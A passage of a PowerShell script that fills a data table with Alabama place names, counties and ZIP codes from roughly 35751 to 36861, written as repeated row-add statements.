$Cities.Rows.Add("Hollytree","Jackson","Alabama","AL","1","35751") + $null = $Cities.Rows.Add("Hollywood","Jackson","Alabama","AL","1","35752") + $null = $Cities.Rows.Add("Laceys spring","Morgan","Alabama","AL","1","35754") + $null = $Cities.Rows.Add("Langston","Marshall","Alabama","AL","1","35755") + $null = $Cities.Rows.Add("Zcta 35756","Limestone","Alabama","AL","1","35756") + $null = $Cities.Rows.Add("Zcta 35757","Madison","Alabama","AL","1","35757") + $null = $Cities.Rows.Add("Triana","Madison","Alabama","AL","1","35758") + $null = $Cities.Rows.Add("Meridianville","Madison","Alabama","AL","1","35759") + $null = $Cities.Rows.Add("New hope","Madison","Alabama","AL","1","35760") + $null = $Cities.Rows.Add("New market","Madison","Alabama","AL","1","35761") + $null = $Cities.Rows.Add("Big cove","Madison","Alabama","AL","1","35763") + $null = $Cities.Rows.Add("Paint rock","Jackson","Alabama","AL","1","35764") + $null = $Cities.Rows.Add("Pisgah","Jackson","Alabama","AL","1","35765") + $null = $Cities.Rows.Add("Princeton","Jackson","Alabama","AL","1","35766") + $null = $Cities.Rows.Add("Hytop","Jackson","Alabama","AL","1","35768") + $null = $Cities.Rows.Add("Zcta 35769","Jackson","Alabama","AL","1","35769") + $null = $Cities.Rows.Add("Section","Jackson","Alabama","AL","1","35771") + $null = $Cities.Rows.Add("Stevenson","Jackson","Alabama","AL","1","35772") + $null = $Cities.Rows.Add("Toney","Madison","Alabama","AL","1","35773") + $null = $Cities.Rows.Add("Trenton","Jackson","Alabama","AL","1","35774") + $null = $Cities.Rows.Add("Valhermoso sprin","Morgan","Alabama","AL","1","35775") + $null = $Cities.Rows.Add("Woodville","Jackson","Alabama","AL","1","35776") + $null = $Cities.Rows.Add("Zcta 357hh","Jackson","Alabama","AL","1","357HH") + $null = $Cities.Rows.Add("Zcta 357xx","Madison","Alabama","AL","1","357XX") + $null = $Cities.Rows.Add("Huntsville","Madison","Alabama","AL","1","35801") + $null = $Cities.Rows.Add("Huntsville","Madison","Alabama","AL","1","35802") + $null = $Cities.Rows.Add("Huntsville","Madison","Alabama","AL","1","35803") + $null = $Cities.Rows.Add("Huntsville","Madison","Alabama","AL","1","35805") + $null = $Cities.Rows.Add("Huntsville","Madison","Alabama","AL","1","35806") + $null = $Cities.Rows.Add("Huntsville","Madison","Alabama","AL","1","35808") + $null = $Cities.Rows.Add("Huntsville","Madison","Alabama","AL","1","35810") + $null = $Cities.Rows.Add("Huntsville","Madison","Alabama","AL","1","35811") + $null = $Cities.Rows.Add("Huntsville","Madison","Alabama","AL","1","35816") + $null = $Cities.Rows.Add("Huntsville","Madison","Alabama","AL","1","35824") + $null = $Cities.Rows.Add("Zcta 358hh","Madison","Alabama","AL","1","358HH") + $null = $Cities.Rows.Add("Zcta 358xx","Madison","Alabama","AL","1","358XX") + $null = $Cities.Rows.Add("Southside","Etowah","Alabama","AL","1","35901") + $null = $Cities.Rows.Add("Hokes bluff","Etowah","Alabama","AL","1","35903") + $null = $Cities.Rows.Add("Gadsden","Etowah","Alabama","AL","1","35904") + $null = $Cities.Rows.Add("Glencoe","Etowah","Alabama","AL","1","35905") + $null = $Cities.Rows.Add("Rainbow city","Etowah","Alabama","AL","1","35906") + $null = $Cities.Rows.Add("Zcta 35907","Etowah","Alabama","AL","1","35907") + $null = $Cities.Rows.Add("Albertville","Marshall","Alabama","AL","1","35950") + $null = $Cities.Rows.Add("Zcta 35951","Marshall","Alabama","AL","1","35951") + $null = $Cities.Rows.Add("Snead","Etowah","Alabama","AL","1","35952") + $null = $Cities.Rows.Add("Ashville","St. Clair","Alabama","AL","1","35953") + $null = $Cities.Rows.Add("Attalla","Etowah","Alabama","AL","1","35954") + $null = $Cities.Rows.Add("Zcta 35956","Etowah","Alabama","AL","1","35956") + $null = $Cities.Rows.Add("Boaz","Marshall","Alabama","AL","1","35957") + $null = $Cities.Rows.Add("Bryant","Jackson","Alabama","AL","1","35958") + $null = $Cities.Rows.Add("Cedar bluff","Cherokee","Alabama","AL","1","35959") + $null = $Cities.Rows.Add("Centre","Cherokee","Alabama","AL","1","35960") + $null = $Cities.Rows.Add("Collinsville","DeKalb","Alabama","AL","1","35961") + $null = $Cities.Rows.Add("Crossville","DeKalb","Alabama","AL","1","35962") + $null = $Cities.Rows.Add("Dawson","DeKalb","Alabama","AL","1","35963") + $null = $Cities.Rows.Add("Flat rock","Jackson","Alabama","AL","1","35966") + $null = $Cities.Rows.Add("Fort payne","DeKalb","Alabama","AL","1","35967") + $null = $Cities.Rows.Add("Zcta 35968","DeKalb","Alabama","AL","1","35968") + $null = $Cities.Rows.Add("Fyffe","DeKalb","Alabama","AL","1","35971") + $null = $Cities.Rows.Add("Gallant","Etowah","Alabama","AL","1","35972") + $null = $Cities.Rows.Add("Gaylesville","Cherokee","Alabama","AL","1","35973") + $null = $Cities.Rows.Add("Geraldine","DeKalb","Alabama","AL","1","35974") + $null = $Cities.Rows.Add("Groveoak","DeKalb","Alabama","AL","1","35975") + $null = $Cities.Rows.Add("Guntersville","Marshall","Alabama","AL","1","35976") + $null = $Cities.Rows.Add("Henagar","DeKalb","Alabama","AL","1","35978") + $null = $Cities.Rows.Add("Higdon","DeKalb","Alabama","AL","1","35979") + $null = $Cities.Rows.Add("Horton","Marshall","Alabama","AL","1","35980") + $null = $Cities.Rows.Add("Ider","DeKalb","Alabama","AL","1","35981") + $null = $Cities.Rows.Add("Leesburg","Cherokee","Alabama","AL","1","35983") + $null = $Cities.Rows.Add("Mentone","DeKalb","Alabama","AL","1","35984") + $null = $Cities.Rows.Add("Rainsville","DeKalb","Alabama","AL","1","35986") + $null = $Cities.Rows.Add("Steele","St. Clair","Alabama","AL","1","35987") + $null = $Cities.Rows.Add("Sylvania","DeKalb","Alabama","AL","1","35988") + $null = $Cities.Rows.Add("Valley head","DeKalb","Alabama","AL","1","35989") + $null = $Cities.Rows.Add("Walnut grove","Etowah","Alabama","AL","1","35990") + $null = $Cities.Rows.Add("Zcta 359hh","Cherokee","Alabama","AL","1","359HH") + $null = $Cities.Rows.Add("Autaugaville","Autauga","Alabama","AL","1","36003") + $null = $Cities.Rows.Add("Banks","Pike","Alabama","AL","1","36005") + $null = $Cities.Rows.Add("Billingsley","Autauga","Alabama","AL","1","36006") + $null = $Cities.Rows.Add("Brantley","Crenshaw","Alabama","AL","1","36009") + $null = $Cities.Rows.Add("Brundidge","Pike","Alabama","AL","1","36010") + $null = $Cities.Rows.Add("Cecil","Montgomery","Alabama","AL","1","36013") + $null = $Cities.Rows.Add("Clayton","Barbour","Alabama","AL","1","36016") + $null = $Cities.Rows.Add("Clio","Barbour","Alabama","AL","1","36017") + $null = $Cities.Rows.Add("Coosada","Elmore","Alabama","AL","1","36020") + $null = $Cities.Rows.Add("Deatsville","Elmore","Alabama","AL","1","36022") + $null = $Cities.Rows.Add("Eclectic","Elmore","Alabama","AL","1","36024") + $null = $Cities.Rows.Add("Elmore","Elmore","Alabama","AL","1","36025") + $null = $Cities.Rows.Add("Equality","Coosa","Alabama","AL","1","36026") + $null = $Cities.Rows.Add("Eufaula","Barbour","Alabama","AL","1","36027") + $null = $Cities.Rows.Add("Dozier","Covington","Alabama","AL","1","36028") + $null = $Cities.Rows.Add("Fitzpatrick","Bullock","Alabama","AL","1","36029") + $null = $Cities.Rows.Add("Forest home","Butler","Alabama","AL","1","36030") + $null = $Cities.Rows.Add("Fort davis","Macon","Alabama","AL","1","36031") + $null = $Cities.Rows.Add("Fort deposit","Lowndes","Alabama","AL","1","36032") + $null = $Cities.Rows.Add("Georgiana","Butler","Alabama","AL","1","36033") + $null = $Cities.Rows.Add("Glenwood","Pike","Alabama","AL","1","36034") + $null = $Cities.Rows.Add("Goshen","Pike","Alabama","AL","1","36035") + $null = $Cities.Rows.Add("Grady","Montgomery","Alabama","AL","1","36036") + $null = $Cities.Rows.Add("Greenville","Butler","Alabama","AL","1","36037") + $null = $Cities.Rows.Add("Hardaway","Macon","Alabama","AL","1","36039") + $null = $Cities.Rows.Add("Hayneville","Lowndes","Alabama","AL","1","36040") + $null = $Cities.Rows.Add("Highland home","Crenshaw","Alabama","AL","1","36041") + $null = $Cities.Rows.Add("Honoraville","Crenshaw","Alabama","AL","1","36042") + $null = $Cities.Rows.Add("Hope hull","Montgomery","Alabama","AL","1","36043") + $null = $Cities.Rows.Add("Lapine","Crenshaw","Alabama","AL","1","36046") + $null = $Cities.Rows.Add("Letohatchee","Lowndes","Alabama","AL","1","36047") + $null = $Cities.Rows.Add("Louisville","Barbour","Alabama","AL","1","36048") + $null = $Cities.Rows.Add("Luverne","Crenshaw","Alabama","AL","1","36049") + $null = $Cities.Rows.Add("Marbury","Autauga","Alabama","AL","1","36051") + $null = $Cities.Rows.Add("Mathews","Montgomery","Alabama","AL","1","36052") + $null = $Cities.Rows.Add("Midway","Bullock","Alabama","AL","1","36053") + $null = $Cities.Rows.Add("Millbrook","Elmore","Alabama","AL","1","36054") + $null = $Cities.Rows.Add("Pike road","Montgomery","Alabama","AL","1","36064") + $null = $Cities.Rows.Add("Pine level","Montgomery","Alabama","AL","1","36065") + $null = $Cities.Rows.Add("Prattville","Autauga","Alabama","AL","1","36066") + $null = $Cities.Rows.Add("Prattville","Autauga","Alabama","AL","1","36067") + $null = $Cities.Rows.Add("Ramer","Montgomery","Alabama","AL","1","36069") + $null = $Cities.Rows.Add("Rutledge","Crenshaw","Alabama","AL","1","36071") + $null = $Cities.Rows.Add("Shorter","Macon","Alabama","AL","1","36075") + $null = $Cities.Rows.Add("Tallassee","Elmore","Alabama","AL","1","36078") + $null = $Cities.Rows.Add("Zcta 36079","Pike","Alabama","AL","1","36079") + $null = $Cities.Rows.Add("Titus","Elmore","Alabama","AL","1","36080") + $null = $Cities.Rows.Add("Troy","Pike","Alabama","AL","1","36081") + $null = $Cities.Rows.Add("Tuskegee","Macon","Alabama","AL","1","36083") + $null = $Cities.Rows.Add("Tuskegee institu","Macon","Alabama","AL","1","36088") + $null = $Cities.Rows.Add("Union springs","Bullock","Alabama","AL","1","36089") + $null = $Cities.Rows.Add("Verbena","Chilton","Alabama","AL","1","36091") + $null = $Cities.Rows.Add("Wetumpka","Elmore","Alabama","AL","1","36092") + $null = $Cities.Rows.Add("Zcta 36093","Elmore","Alabama","AL","1","36093") + $null = $Cities.Rows.Add("Zcta 360hh","Autauga","Alabama","AL","1","360HH") + $null = $Cities.Rows.Add("Zcta 360xx","Butler","Alabama","AL","1","360XX") + $null = $Cities.Rows.Add("Montgomery","Montgomery","Alabama","AL","1","36104") + $null = $Cities.Rows.Add("Montgomery","Montgomery","Alabama","AL","1","36105") + $null = $Cities.Rows.Add("Montgomery","Montgomery","Alabama","AL","1","36106") + $null = $Cities.Rows.Add("Montgomery","Montgomery","Alabama","AL","1","36107") + $null = $Cities.Rows.Add("Montgomery","Montgomery","Alabama","AL","1","36108") + $null = $Cities.Rows.Add("Montgomery","Montgomery","Alabama","AL","1","36109") + $null = $Cities.Rows.Add("Montgomery","Montgomery","Alabama","AL","1","36110") + $null = $Cities.Rows.Add("Montgomery","Montgomery","Alabama","AL","1","36111") + $null = $Cities.Rows.Add("Maxwell a f b","Montgomery","Alabama","AL","1","36113") + $null = $Cities.Rows.Add("Gunter afs","Montgomery","Alabama","AL","1","36115") + $null = $Cities.Rows.Add("Montgomery","Montgomery","Alabama","AL","1","36116") + $null = $Cities.Rows.Add("Montgomery","Montgomery","Alabama","AL","1","36117") + $null = $Cities.Rows.Add("Zcta 361hh","Montgomery","Alabama","AL","1","361HH") + $null = $Cities.Rows.Add("Anniston","Calhoun","Alabama","AL","1","36201") + $null = $Cities.Rows.Add("Oxford","Calhoun","Alabama","AL","1","36203") + $null = $Cities.Rows.Add("Fort mc clellan","Calhoun","Alabama","AL","1","36205") + $null = $Cities.Rows.Add("Anniston","Calhoun","Alabama","AL","1","36206") + $null = $Cities.Rows.Add("Zcta 36207","Calhoun","Alabama","AL","1","36207") + $null = $Cities.Rows.Add("Alexandria","Calhoun","Alabama","AL","1","36250") + $null = $Cities.Rows.Add("Ashland","Clay","Alabama","AL","1","36251") + $null = $Cities.Rows.Add("Cragford","Clay","Alabama","AL","1","36255") + $null = $Cities.Rows.Add("Daviston","Tallapoosa","Alabama","AL","1","36256") + $null = $Cities.Rows.Add("Delta","Clay","Alabama","AL","1","36258") + $null = $Cities.Rows.Add("Eastaboga","Calhoun","Alabama","AL","1","36260") + $null = $Cities.Rows.Add("Fruithurst","Cleburne","Alabama","AL","1","36262") + $null = $Cities.Rows.Add("Graham","Randolph","Alabama","AL","1","36263") + $null = $Cities.Rows.Add("Heflin","Cleburne","Alabama","AL","1","36264") + $null = $Cities.Rows.Add("Jacksonville","Calhoun","Alabama","AL","1","36265") + $null = $Cities.Rows.Add("Lineville","Clay","Alabama","AL","1","36266") + $null = $Cities.Rows.Add("Millerville","Clay","Alabama","AL","1","36267") + $null = $Cities.Rows.Add("Munford","Talladega","Alabama","AL","1","36268") + $null = $Cities.Rows.Add("Muscadine","Cleburne","Alabama","AL","1","36269") + $null = $Cities.Rows.Add("Newell","Randolph","Alabama","AL","1","36270") + $null = $Cities.Rows.Add("Ohatchee","Calhoun","Alabama","AL","1","36271") + $null = $Cities.Rows.Add("Piedmont","Calhoun","Alabama","AL","1","36272") + $null = $Cities.Rows.Add("Ranburne","Cleburne","Alabama","AL","1","36273") + $null = $Cities.Rows.Add("Rock mills","Randolph","Alabama","AL","1","36274") + $null = $Cities.Rows.Add("Wadley","Randolph","Alabama","AL","1","36276") + $null = $Cities.Rows.Add("Weaver","Calhoun","Alabama","AL","1","36277") + $null = $Cities.Rows.Add("Wedowee","Randolph","Alabama","AL","1","36278") + $null = $Cities.Rows.Add("Wellington","Calhoun","Alabama","AL","1","36279") + $null = $Cities.Rows.Add("Woodland","Randolph","Alabama","AL","1","36280") + $null = $Cities.Rows.Add("Zcta 362hh","Calhoun","Alabama","AL","1","362HH") + $null = $Cities.Rows.Add("Zcta 362xx","Calhoun","Alabama","AL","1","362XX") + $null = $Cities.Rows.Add("Taylor","Houston","Alabama","AL","1","36301") + $null = $Cities.Rows.Add("Napier field","Houston","Alabama","AL","1","36303") + $null = $Cities.Rows.Add("Zcta 36305","Houston","Alabama","AL","1","36305") + $null = $Cities.Rows.Add("Abbeville","Henry","Alabama","AL","1","36310") + $null = $Cities.Rows.Add("Ariton","Dale","Alabama","AL","1","36311") + $null = $Cities.Rows.Add("Ashford","Houston","Alabama","AL","1","36312") + $null = $Cities.Rows.Add("Bellwood","Geneva","Alabama","AL","1","36313") + $null = $Cities.Rows.Add("Black","Geneva","Alabama","AL","1","36314") + $null = $Cities.Rows.Add("Chancellor","Geneva","Alabama","AL","1","36316") + $null = $Cities.Rows.Add("Clopton","Henry","Alabama","AL","1","36317") + $null = $Cities.Rows.Add("Coffee springs","Geneva","Alabama","AL","1","36318") + $null = $Cities.Rows.Add("Columbia","Houston","Alabama","AL","1","36319") + $null = $Cities.Rows.Add("Cottonwood","Houston","Alabama","AL","1","36320") + $null = $Cities.Rows.Add("Daleville","Dale","Alabama","AL","1","36322") + $null = $Cities.Rows.Add("Elba","Coffee","Alabama","AL","1","36323") + $null = $Cities.Rows.Add("Enterprise","Coffee","Alabama","AL","1","36330") + $null = $Cities.Rows.Add("Geneva","Geneva","Alabama","AL","1","36340") + $null = $Cities.Rows.Add("Gordon","Houston","Alabama","AL","1","36343") + $null = $Cities.Rows.Add("Hartford","Geneva","Alabama","AL","1","36344") + $null = $Cities.Rows.Add("Headland","Henry","Alabama","AL","1","36345") + $null = $Cities.Rows.Add("Jack","Coffee","Alabama","AL","1","36346") + $null = $Cities.Rows.Add("Midland city","Dale","Alabama","AL","1","36350") + $null = $Cities.Rows.Add("New brockton","Coffee","Alabama","AL","1","36351") + $null = $Cities.Rows.Add("Newton","Houston","Alabama","AL","1","36352") + $null = $Cities.Rows.Add("Newville","Henry","Alabama","AL","1","36353") + $null = $Cities.Rows.Add("Ozark","Dale","Alabama","AL","1","36360") + $null = $Cities.Rows.Add("Fort rucker","Dale","Alabama","AL","1","36362") + $null = $Cities.Rows.Add("Pansey","Houston","Alabama","AL","1","36370") + $null = $Cities.Rows.Add("Pinckard","Dale","Alabama","AL","1","36371") + $null = $Cities.Rows.Add("Shorterville","Henry","Alabama","AL","1","36373") + $null = $Cities.Rows.Add("Skipperville","Dale","Alabama","AL","1","36374") + $null = $Cities.Rows.Add("Slocomb","Geneva","Alabama","AL","1","36375") + $null = $Cities.Rows.Add("Webb","Houston","Alabama","AL","1","36376") + $null = $Cities.Rows.Add("Zcta 363hh","Geneva","Alabama","AL","1","363HH") + $null = $Cities.Rows.Add("Evergreen","Conecuh","Alabama","AL","1","36401") + $null = $Cities.Rows.Add("Andalusia","Covington","Alabama","AL","1","36420") + $null = $Cities.Rows.Add("Beatrice","Monroe","Alabama","AL","1","36425") + $null = $Cities.Rows.Add("East brewton","Escambia","Alabama","AL","1","36426") + $null = $Cities.Rows.Add("Castleberry","Conecuh","Alabama","AL","1","36432") + $null = $Cities.Rows.Add("Coy","Wilcox","Alabama","AL","1","36435") + $null = $Cities.Rows.Add("Dickinson","Clarke","Alabama","AL","1","36436") + $null = $Cities.Rows.Add("Flomaton","Escambia","Alabama","AL","1","36441") + $null = $Cities.Rows.Add("Florala","Covington","Alabama","AL","1","36442") + $null = $Cities.Rows.Add("Franklin","Monroe","Alabama","AL","1","36444") + $null = $Cities.Rows.Add("Frisco city","Monroe","Alabama","AL","1","36445") + $null = $Cities.Rows.Add("Fulton","Clarke","Alabama","AL","1","36446") + $null = $Cities.Rows.Add("Grove hill","Clarke","Alabama","AL","1","36451") + $null = $Cities.Rows.Add("Kinston","Coffee","Alabama","AL","1","36453") + $null = $Cities.Rows.Add("Lockhart","Covington","Alabama","AL","1","36455") + $null = $Cities.Rows.Add("Mc kenzie","Butler","Alabama","AL","1","36456") + $null = $Cities.Rows.Add("Monroeville","Monroe","Alabama","AL","1","36460") + $null = $Cities.Rows.Add("Opp","Covington","Alabama","AL","1","36467") + $null = $Cities.Rows.Add("Perdue hill","Monroe","Alabama","AL","1","36470") + $null = $Cities.Rows.Add("Peterman","Monroe","Alabama","AL","1","36471") + $null = $Cities.Rows.Add("Range","Conecuh","Alabama","AL","1","36473") + $null = $Cities.Rows.Add("Red level","Covington","Alabama","AL","1","36474") + $null = $Cities.Rows.Add("Repton","Conecuh","Alabama","AL","1","36475") + $null = $Cities.Rows.Add("River falls","Covington","Alabama","AL","1","36476") + $null = $Cities.Rows.Add("Samson","Geneva","Alabama","AL","1","36477") + $null = $Cities.Rows.Add("Uriah","Monroe","Alabama","AL","1","36480") + $null = $Cities.Rows.Add("Vredenburgh","Monroe","Alabama","AL","1","36481") + $null = $Cities.Rows.Add("Whatley","Clarke","Alabama","AL","1","36482") + $null = $Cities.Rows.Add("Wing","Covington","Alabama","AL","1","36483") + $null = $Cities.Rows.Add("Zcta 364hh","Clarke","Alabama","AL","1","364HH") + $null = $Cities.Rows.Add("Zcta 364xx","Clarke","Alabama","AL","1","364XX") + $null = $Cities.Rows.Add("Alma","Clarke","Alabama","AL","1","36501") + $null = $Cities.Rows.Add("Atmore","Escambia","Alabama","AL","1","36502") + $null = $Cities.Rows.Add("Axis","Mobile","Alabama","AL","1","36505") + $null = $Cities.Rows.Add("Bay minette","Baldwin","Alabama","AL","1","36507") + $null = $Cities.Rows.Add("Bayou la batre","Mobile","Alabama","AL","1","36509") + $null = $Cities.Rows.Add("Bon secour","Baldwin","Alabama","AL","1","36511") + $null = $Cities.Rows.Add("Calvert","Washington","Alabama","AL","1","36513") + $null = $Cities.Rows.Add("Carlton","Clarke","Alabama","AL","1","36515") + $null = $Cities.Rows.Add("Chatom","Washington","Alabama","AL","1","36518") + $null = $Cities.Rows.Add("Chunchula","Mobile","Alabama","AL","1","36521") + $null = $Cities.Rows.Add("Citronelle","Mobile","Alabama","AL","1","36522") + $null = $Cities.Rows.Add("Coden","Mobile","Alabama","AL","1","36523") + $null = $Cities.Rows.Add("Coffeeville","Clarke","Alabama","AL","1","36524") + $null = $Cities.Rows.Add("Creola","Mobile","Alabama","AL","1","36525") + $null = $Cities.Rows.Add("Daphne","Baldwin","Alabama","AL","1","36526") + $null = $Cities.Rows.Add("Spanish fort","Baldwin","Alabama","AL","1","36527") + $null = $Cities.Rows.Add("Dauphin island","Mobile","Alabama","AL","1","36528") + $null = $Cities.Rows.Add("Deer park","Washington","Alabama","AL","1","36529") + $null = $Cities.Rows.Add("Elberta","Baldwin","Alabama","AL","1","36530") + $null = $Cities.Rows.Add("Fairhope","Baldwin","Alabama","AL","1","36532") + $null = $Cities.Rows.Add("Foley","Baldwin","Alabama","AL","1","36535") + $null = $Cities.Rows.Add("Frankville","Washington","Alabama","AL","1","36538") + $null = $Cities.Rows.Add("Fruitdale","Washington","Alabama","AL","1","36539") + $null = $Cities.Rows.Add("Gainestown","Clarke","Alabama","AL","1","36540") + $null = $Cities.Rows.Add("Grand bay","Mobile","Alabama","AL","1","36541") + $null = $Cities.Rows.Add("Fort morgan","Baldwin","Alabama","AL","1","36542") + $null = $Cities.Rows.Add("Irvington","Mobile","Alabama","AL","1","36544") + $null = $Cities.Rows.Add("Jackson","Clarke","Alabama","AL","1","36545") + $null = $Cities.Rows.Add("Leroy","Washington","Alabama","AL","1","36548") + $null = $Cities.Rows.Add("Lillian","Baldwin","Alabama","AL","1","36549") + $null = $Cities.Rows.Add("Little river","Baldwin","Alabama","AL","1","36550") + $null = $Cities.Rows.Add("Loxley","Baldwin","Alabama","AL","1","36551") + $null = $Cities.Rows.Add("Mc intosh","Washington","Alabama","AL","1","36553") + $null = $Cities.Rows.Add("Malcolm","Washington","Alabama","AL","1","36556") + $null = $Cities.Rows.Add("Millry","Washington","Alabama","AL","1","36558") + $null = $Cities.Rows.Add("Montrose","Baldwin","Alabama","AL","1","36559") + $null = $Cities.Rows.Add("Mount vernon","Mobile","Alabama","AL","1","36560") + $null = $Cities.Rows.Add("Orange beach","Baldwin","Alabama","AL","1","36561") + $null = $Cities.Rows.Add("Perdido","Baldwin","Alabama","AL","1","36562") + $null = $Cities.Rows.Add("Point clear","Baldwin","Alabama","AL","1","36564") + $null = $Cities.Rows.Add("Robertsdale","Baldwin","Alabama","AL","1","36567") + $null = $Cities.Rows.Add("Saint stephens","Washington","Alabama","AL","1","36569") + $null = $Cities.Rows.Add("Salitpa","Clarke","Alabama","AL","1","36570") + $null = $Cities.Rows.Add("Saraland","Mobile","Alabama","AL","1","36571") + $null = $Cities.Rows.Add("Satsuma","Mobile","Alabama","AL","1","36572") + $null = $Cities.Rows.Add("Seminole","Baldwin","Alabama","AL","1","36574") + $null = $Cities.Rows.Add("Semmes","Mobile","Alabama","AL","1","36575") + $null = $Cities.Rows.Add("Silverhill","Baldwin","Alabama","AL","1","36576") + $null = $Cities.Rows.Add("Zcta 36577","Baldwin","Alabama","AL","1","36577") + $null = $Cities.Rows.Add("Stapleton","Baldwin","Alabama","AL","1","36578") + $null = $Cities.Rows.Add("Stockton","Baldwin","Alabama","AL","1","36579") + $null = $Cities.Rows.Add("Summerdale","Baldwin","Alabama","AL","1","36580") + $null = $Cities.Rows.Add("Sunflower","Washington","Alabama","AL","1","36581") + $null = $Cities.Rows.Add("Theodore","Mobile","Alabama","AL","1","36582") + $null = $Cities.Rows.Add("Tibbie","Washington","Alabama","AL","1","36583") + $null = $Cities.Rows.Add("Vinegar bend","Washington","Alabama","AL","1","36584") + $null = $Cities.Rows.Add("Wagarville","Washington","Alabama","AL","1","36585") + $null = $Cities.Rows.Add("Wilmer","Mobile","Alabama","AL","1","36587") + $null = $Cities.Rows.Add("Zcta 365hh","Baldwin","Alabama","AL","1","365HH") + $null = $Cities.Rows.Add("Zcta 365xx","Washington","Alabama","AL","1","365XX") + $null = $Cities.Rows.Add("Mobile","Mobile","Alabama","AL","1","36602") + $null = $Cities.Rows.Add("Mobile","Mobile","Alabama","AL","1","36603") + $null = $Cities.Rows.Add("Mobile","Mobile","Alabama","AL","1","36604") + $null = $Cities.Rows.Add("Mobile","Mobile","Alabama","AL","1","36605") + $null = $Cities.Rows.Add("Mobile","Mobile","Alabama","AL","1","36606") + $null = $Cities.Rows.Add("Mobile","Mobile","Alabama","AL","1","36607") + $null = $Cities.Rows.Add("Mobile","Mobile","Alabama","AL","1","36608") + $null = $Cities.Rows.Add("Mobile","Mobile","Alabama","AL","1","36609") + $null = $Cities.Rows.Add("Prichard","Mobile","Alabama","AL","1","36610") + $null = $Cities.Rows.Add("Chickasaw","Mobile","Alabama","AL","1","36611") + $null = $Cities.Rows.Add("Mobile","Mobile","Alabama","AL","1","36612") + $null = $Cities.Rows.Add("Eight mile","Mobile","Alabama","AL","1","36613") + $null = $Cities.Rows.Add("Mobile","Mobile","Alabama","AL","1","36617") + $null = $Cities.Rows.Add("Mobile","Mobile","Alabama","AL","1","36618") + $null = $Cities.Rows.Add("Mobile","Mobile","Alabama","AL","1","36619") + $null = $Cities.Rows.Add("Mobile","Mobile","Alabama","AL","1","36693") + $null = $Cities.Rows.Add("Mobile","Mobile","Alabama","AL","1","36695") + $null = $Cities.Rows.Add("Zcta 366hh","Mobile","Alabama","AL","1","366HH") + $null = $Cities.Rows.Add("Selma","Dallas","Alabama","AL","1","36701") + $null = $Cities.Rows.Add("Selma","Dallas","Alabama","AL","1","36703") + $null = $Cities.Rows.Add("Alberta","Wilcox","Alabama","AL","1","36720") + $null = $Cities.Rows.Add("Arlington","Wilcox","Alabama","AL","1","36722") + $null = $Cities.Rows.Add("Boykin","Wilcox","Alabama","AL","1","36723") + $null = $Cities.Rows.Add("Camden","Wilcox","Alabama","AL","1","36726") + $null = $Cities.Rows.Add("Campbell","Clarke","Alabama","AL","1","36727") + $null = $Cities.Rows.Add("Catherine","Wilcox","Alabama","AL","1","36728") + $null = $Cities.Rows.Add("Demopolis","Marengo","Alabama","AL","1","36732") + $null = $Cities.Rows.Add("Dixons mills","Marengo","Alabama","AL","1","36736") + $null = $Cities.Rows.Add("Faunsdale","Marengo","Alabama","AL","1","36738") + $null = $Cities.Rows.Add("Forkland","Greene","Alabama","AL","1","36740") + $null = $Cities.Rows.Add("Gallion","Marengo","Alabama","AL","1","36742") + $null = $Cities.Rows.Add("Greensboro","Hale","Alabama","AL","1","36744") + $null = $Cities.Rows.Add("Linden","Marengo","Alabama","AL","1","36748") + $null = $Cities.Rows.Add("Jones","Autauga","Alabama","AL","1","36749") + $null = $Cities.Rows.Add("Maplesville","Chilton","Alabama","AL","1","36750") + $null = $Cities.Rows.Add("Lower peach tree","Wilcox","Alabama","AL","1","36751") + $null = $Cities.Rows.Add("Burkville","Lowndes","Alabama","AL","1","36752") + $null = $Cities.Rows.Add("Magnolia","Marengo","Alabama","AL","1","36754") + $null = $Cities.Rows.Add("Marion","Perry","Alabama","AL","1","36756") + $null = $Cities.Rows.Add("Plantersville","Dallas","Alabama","AL","1","36758") + $null = $Cities.Rows.Add("Marion junction","Dallas","Alabama","AL","1","36759") + $null = $Cities.Rows.Add("Boys ranch","Dallas","Alabama","AL","1","36761") + $null = $Cities.Rows.Add("Myrtlewood","Marengo","Alabama","AL","1","36763") + $null = $Cities.Rows.Add("Newbern","Hale","Alabama","AL","1","36765") + $null = $Cities.Rows.Add("Orrville","Dallas","Alabama","AL","1","36767") + $null = $Cities.Rows.Add("Pine apple","Wilcox","Alabama","AL","1","36768") + $null = $Cities.Rows.Add("Pine hill","Wilcox","Alabama","AL","1","36769") + $null = $Cities.Rows.Add("Safford","Dallas","Alabama","AL","1","36773") + $null = $Cities.Rows.Add("Sardis","Dallas","Alabama","AL","1","36775") + $null = $Cities.Rows.Add("Sawyerville","Hale","Alabama","AL","1","36776") + $null = $Cities.Rows.Add("Sprott","Perry","Alabama","AL","1","36779") + $null = $Cities.Rows.Add("Sweet water","Marengo","Alabama","AL","1","36782") + $null = $Cities.Rows.Add("Thomaston","Marengo","Alabama","AL","1","36783") + $null = $Cities.Rows.Add("Thomasville","Clarke","Alabama","AL","1","36784") + $null = $Cities.Rows.Add("Benton","Lowndes","Alabama","AL","1","36785") + $null = $Cities.Rows.Add("Uniontown","Perry","Alabama","AL","1","36786") + $null = $Cities.Rows.Add("Stanton","Chilton","Alabama","AL","1","36790") + $null = $Cities.Rows.Add("Randolph","Bibb","Alabama","AL","1","36792") + $null = $Cities.Rows.Add("Lawley","Bibb","Alabama","AL","1","36793") + $null = $Cities.Rows.Add("Zcta 367hh","Autauga","Alabama","AL","1","367HH") + $null = $Cities.Rows.Add("Zcta 367xx","Marengo","Alabama","AL","1","367XX") + $null = $Cities.Rows.Add("Opelika","Lee","Alabama","AL","1","36801") + $null = $Cities.Rows.Add("Zcta 36804","Lee","Alabama","AL","1","36804") + $null = $Cities.Rows.Add("Auburn","Lee","Alabama","AL","1","36830") + $null = $Cities.Rows.Add("Auburn","Lee","Alabama","AL","1","36832") + $null = $Cities.Rows.Add("Auburn","Lee","Alabama","AL","1","36849") + $null = $Cities.Rows.Add("Camp hill","Tallapoosa","Alabama","AL","1","36850") + $null = $Cities.Rows.Add("Cusseta","Lee","Alabama","AL","1","36852") + $null = $Cities.Rows.Add("Dadeville","Tallapoosa","Alabama","AL","1","36853") + $null = $Cities.Rows.Add("Valley","Chambers","Alabama","AL","1","36854") + $null = $Cities.Rows.Add("Five points","Chambers","Alabama","AL","1","36855") + $null = $Cities.Rows.Add("Fort mitchell","Russell","Alabama","AL","1","36856") + $null = $Cities.Rows.Add("Hatchechubbee","Russell","Alabama","AL","1","36858") + $null = $Cities.Rows.Add("Hurtsboro","Russell","Alabama","AL","1","36860") + $null = $Cities.Rows.Add("Jacksons gap","Tallapoosa","Alabama","AL","1","36861") + $null = 